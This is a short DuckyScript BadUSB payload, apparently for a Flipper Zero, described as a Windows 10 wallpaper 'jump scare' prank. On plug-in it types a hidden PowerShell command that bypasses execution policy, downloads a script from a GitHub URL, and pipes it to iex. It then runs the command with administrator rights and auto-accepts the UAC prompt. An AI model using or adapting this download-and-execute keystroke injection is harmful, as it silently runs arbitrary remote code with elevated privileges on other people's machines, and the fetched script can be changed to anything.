REM Title: beigeworm's Wallpaper Jump Scare.
REM Author: @beigeworm
REM Description: This script changes downlaods a scary image and sets it as a wallpaper.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Wallpaper-Jumpscare/main.ps1
 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y

